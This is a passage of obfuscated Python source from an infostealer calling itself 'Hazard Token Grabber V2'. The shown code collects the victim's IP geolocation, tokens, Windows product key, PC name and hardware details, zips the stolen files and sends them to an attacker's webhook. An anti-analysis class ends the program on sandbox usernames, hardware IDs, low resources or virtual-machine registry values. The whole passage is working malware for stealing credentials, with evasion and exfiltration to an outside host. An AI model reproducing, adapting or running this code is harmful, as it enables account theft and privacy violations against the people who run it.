].replace (" ","᠎ ")#line:488 OO0O0OO0O00OO00O0 =O00O0O00OO00O00OO [1 ].replace (" ","᠎ ")#line:489 O0000O0OOOO0OO000 =["https://ipinfo.io/json","https://utilities.tk/network/info"]#line:491 OO000OOOOOOOO0OOO =choice (O0000O0OOOO0OO000 )#line:492 O000OO000000000O0 =httpx .get (OO000OOOOOOOO0OOO ).json ()#line:493 OO00OOOO0O00O00OO =O000OO000000000O0 .get ('ip')#line:495 O00OOO00OO00OO00O =O000OO000000000O0 .get ('city')#line:496 O0O0O0OOO000OO00O =O000OO000000000O0 .get ('country')#line:497 O0OOO0O0OOOO0O0O0 =O000OO000000000O0 .get ('region')#line:498 OO0OO0O0O0OO0O000 =O000OO000000000O0 .get ('org')#line:499 O0O0OO00OOOOO0OOO =O000OO000000000O0 .get ('loc')#line:500 O0000OO0O0OO0O00O ="https://www.google.com/maps/search/google+map++"+O0O0OO00OOOOO0OOO #line:501 _O00OO0OOOO000O000 =os .path .join (O0OO0OOOO0OOOO000 .appdata ,f'Hazard.V2-[{Victim}].zip')#line:503 O0OO00OO0OOO00O00 =zipfile .ZipFile (_O00OO0OOOO000O000 ,"w",zipfile .ZIP_DEFLATED )#line:504 OOOO000OO000OO000 =os .path .abspath (O0OO0OOOO0OOOO000 .dir )#line:505 for O0000O000OOO0O000 ,_OOO0OOO00O00OO000 ,OO0000OOO0O00O0O0 in os .walk (O0OO0OOOO0OOOO000 .dir ):#line:506 for OO000OOO0O0O0O00O in OO0000OOO0O00O0O0 :#line:507 O0O0O0O0OOOOOOO0O =os .path .abspath (os .path .join (O0000O000OOO0O000 ,OO000OOO0O0O0O00O ))#line:508 OOOOOO00000O0O00O =O0O0O0O0OOOOOOO0O [len (OOOO000OO000OO000 )+1 :]#line:509 O0OO00OO0OOO00O00 .write (O0O0O0O0OOOOOOO0O ,OOOOOO00000O0O00O )#line:510 O0OO00OO0OOO00O00 .close ()#line:511 OO0OOOOO0OO0O0000 =''#line:512 for O00O00OO0OOO00000 in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:513 OO0OOOOO0OO0O0000 +=f"・{O00O00OO0OOO00000}\n"#line:514 OOO0000OOOO000O0O =''#line:515 for OOO00OOOOOO000O00 in O0OO0OOOO0OOOO000 .tokens :#line:516 OOO0000OOOO000O0O +=f'{OOO00OOOOOO000O00}\n\n'#line:517 O0O0OOO00OO0O0000 =f"{len(OO0000OOO0O00O0O0)} Files Found: "#line:518 OOOO0O0O00OO0O0O0 ={'avatar_url':'https://quartzwarrior.xyz/Quartzgif.gif','embeds':[{'author':{'name':f'*{Victim}* Just ran Token Grabber','url':'https://github.com/Rdimo/Hazard-Token-Grabber-V2','icon_url':'https://quartzwarrior.xyz/Quartzgif.gif'},'color':176185 ,'description':f'[Google Maps Location]({O0000OO0O0OO0O00O})','fields':[{'name':'\u200b','value':f'''```fix IP:᠎ {OO00OOOO0O00O00OO.replace(" ", "᠎ ") if OO00OOOO0O00O00OO else "N/A"} Org:᠎ {OO0OO0O0O0OO0O000.replace(" ", "᠎ ") if OO0OO0O0O0OO0O000 else "N/A"} City:᠎ {O00OOO00OO00OO00O.replace(" ", "᠎ ") if O00OOO00OO00OO00O else "N/A"} Region:᠎ {O0OOO0O0OOOO0O0O0.replace(" ", "᠎ ") if O0OOO0O0OOOO0O0O0 else "N/A"} Country:᠎ {O0O0O0OOO000OO00O.replace(" ", "᠎ ") if O0O0O0OOO000OO00O else "N/A"}``` '''.replace (' ',''),'inline':True },{'name':'\u200b','value':f'''```fix PCName: {Victim_pc.replace(" ", "᠎ ")} WinKey:᠎ {OO0O0OO0O00OO00O0} Platform:᠎ {O0OOO0O0000OOOO00} DiskSpace:᠎ {disk}GB Ram:᠎ {ram}GB``` '''.replace (' ',''),'inline':True },{'name':'**Tokens:**','value':f'''```yaml {OOO0000OOOO000O0O if OOO0000OOOO000O0O else "No tokens extracted"}``` '''.replace (' ',''),'inline':False },{'name':O0O0OOO00OO0O0000 ,'value':f'''```ini [ {OO0OOOOO0OO0O0000.strip()} ]``` '''.replace (' ',''),'inline':False }],'footer':{'text':'🌟・Grabber by Quartz'}}]}#line:575 with open (_O00OO0OOOO000O000 ,'rb')as O00O00OO0OOO00000 :#line:576 if O0OO0OOOO0OOOO000 .hook_reg in O0OO0OOOO0OOOO000 .webhook :#line:577 httpx .post (O0OO0OOOO0OOOO000 .webhook ,json =OOOO0O0O00OO0O0O0 )#line:578 httpx .post (O0OO0OOOO0OOOO000 .webhook ,files ={'upload_file':O00O00OO0OOO00000 })#line:579 else :#line:580 from pyotp import TOTP #line:581 OOO00OO0O00O00OO0 =TOTP (O0OO0OOOO0OOOO000 .fetch_conf ('protection')).now ()#line:582 httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },json =OOOO0O0O00OO0O0O0 )#line:583 httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },files ={'upload_file':O00O00OO0OOO00000 })#line:584 os .remove (_O00OO0OOOO000O000 )#line:585 class AntiDebug (Functions ):#line:588 inVM =False #line:589 def __init__ (O0O0O0000O00O00O0 ):#line:591 O0O0O0000O00O00O0 .processes =list ()#line:592 O0O0O0000O00O00O0 .blackListedUsers =["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl",]#line:597 O0O0O0000O00O00O0 .blackListedPCNames =["BEE7370C-8C0C-4","DESKTOP-NAKFFMT","WIN-5E07COS9ALR","B30F0242-1C6A-4","DESKTOP-VRSQLAG","Q9IATRKPRH","XC64ZB","DESKTOP-D019GDM","DESKTOP-WI8CLET","SERVER1","LISA-PC","JOHN-PC","DESKTOP-B0T93D6","DESKTOP-1PYKP29","DESKTOP-1Y2433R","WILEYPC","WORK","6C4E733F-C2D9-4","RALPHS-PC","DESKTOP-WG3MYJS","DESKTOP-7XC6GEZ","DESKTOP-5OV9S0O","QarZhrdBpj","ORELEEPC","ARCHIBALDPC","JULIA-PC","d1bnJkfVlH",]#line:602 O0O0O0000O00O00O0 .blackListedHWIDS =["7AB5C494-39F5-4941-9163-47F54D6D5016","032E02B4-0499-05C3-0806-3C0700080009","03DE0294-0480-05DE-1A06-350700080009","11111111-2222-3333-4444-555555555555","6F3CA5EC-BEC9-4A4D-8274-11168F640058","ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548","4C4C4544-0050-3710-8058-CAC04F59344A","00000000-0000-0000-0000-AC1F6BD04972","79AF5279-16CF-4094-9758-F88A616D81B4","5BD24D56-789F-8468-7CDC-CAA7222CC121","49434D53-0200-9065-2500-65902500E439","49434D53-0200-9036-2500-36902500F022","777D84B3-88D1-451C-93E4-D235177420A7","49434D53-0200-9036-2500-369025000C65","B1112042-52E8-E25B-3655-6A4F54155DBF","00000000-0000-0000-0000-AC1F6BD048FE","EB16924B-FB6D-4FA1-8666-17B91F62FB37","A15A930C-8251-9645-AF63-E45AD728C20C","67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3","C7D23342-A5D4-68A1-59AC-CF40F735B363","63203342-0EB0-AA1A-4DF5-3FB37DBB0670","44B94D56-65AB-DC02-86A0-98143A7423BF","6608003F-ECE4-494E-B07E-1C4615D1D93C","D9142042-8F51-5EFF-D5F8-EE9AE3D1602A","49434D53-0200-9036-2500-369025003AF0","8B4E8278-525C-7343-B825-280AEBCD3BCB","4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27",]#line:613 for O000OO00OOOOOOO0O in [O0O0O0000O00O00O0 .listCheck ,O0O0O0000O00O00O0 .registryCheck ,O0O0O0000O00O00O0 .specsCheck ]:#line:615 OO000O0O00000O0OO =threading .Thread (target =O000OO00OOOOOOO0O ,daemon =True )#line:616 O0O0O0000O00O00O0 .processes .append (OO000O0O00000O0OO )#line:617 OO000O0O00000O0OO .start ()#line:618 for O000OOOO0O0O000OO in O0O0O0000O00O00O0 .processes :#line:619 try :#line:620 O000OOOO0O0O000OO .join ()#line:621 except RuntimeError :#line:622 continue #line:623 def programExit (OOOO00OO00O0OOOO0 ):#line:625 OOOO00OO00O0OOOO0 .__class__ .inVM =True #line:626 def programKill (OOOO00O000O0OO0O0 ,O00O000OOOO000OO0 ):#line:628 try :#line:629 os .system (f"taskkill /F /T /IM {O00O000OOOO000OO0}")#line:630 except (PermissionError ,InterruptedError ,ChildProcessError ,ProcessLookupError ):#line:631 pass #line:632 def listCheck (OOO0000OOOOO00OOO ):#line:634 for OOOOO00O0000000O0 in [r'D:\Tools',r'D:\OS2',r'D:\NT3X']:#line:635 if os .path .exists (OOOOO00O0000000O0 ):#line:636 OOO0000OOOOO00OOO .programExit ()#line:637 for OO00O000O0000O0OO in OOO0000OOOOO00OOO .blackListedUsers :#line:639 if Victim ==OO00O000O0000O0OO :#line:640 OOO0000OOOOO00OOO .programExit ()#line:641 for O0O0O000O0O0OOOOO in OOO0000OOOOO00OOO .blackListedPCNames :#line:643 if Victim_pc ==O0O0O000O0O0OOOOO :#line:644 OOO0000OOOOO00OOO .programExit ()#line:645 try :#line:647 O0O0O00000O0O0000 =subprocess .check_output (r"wmic csproduct get uuid",creationflags =0x08000000 ).decode ().split ('\n')[1 ].strip ()#line:648 except Exception :#line:649 O0O0O00000O0O0000 =""#line:650 for O00OOOOOOO00OO00O in OOO0000OOOOO00OOO .blackListedHWIDS :#line:651 if O0O0O00000O0O0000 ==O00OOOOOOO00OO00O :#line:652 OOO0000OOOOO00OOO .programExit ()#line:653 def specsCheck (O000OOOOO000O00OO ):#line:655 if int (ram )<=2 :#line:657 O000OOOOO000O00OO .programExit ()#line:658 if int (disk )<=50 :#line:659 O000OOOOO000O00OO .programExit ()#line:660 if int (psutil .cpu_count ())<=1 :#line:661 O000OOOOO000O00OO .programExit ()#line:662 def registryCheck (OO0OO00O00O0OO000 ):#line:664 O0O0O0O0O000OOO00 =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")#line:665 OOOOOO000O00O00OO =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")#line:666 if (O0O0O0O0O000OOO00 and OOOOOO000O00O00OO )!=1 :#line:667 OO0OO00O00O0OO000 .programExit ()#line:668 O00OO0O0O000OO00O =winreg .OpenKey (winreg .HKEY_LOCAL_MACHINE ,'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')#line:670 try :#line:671 O00OOO0O0O000O0OO =winreg .QueryValueEx (O00OO0O0O000OO00O ,'0')[0 ]#line:672 if ("VMware"or "VBOX")in O00OOO0O0O000O0OO :#line:673 OO0OO00O00O0OO000 .programExit ()#line:674 finally :#line:675 winreg .CloseKey (O00OO0O0O000OO00O )#line:676 if __name__ =="__main__"and os .name =="nt":#line:679 try :#line:680 httpx .get ('https://google.com')#line:681 except httpx .ConnectTimeout :#line:682 os ._exit (0 )#line:683 asyncio .run (HazardTokenGrabberV2 ().init ())#line:684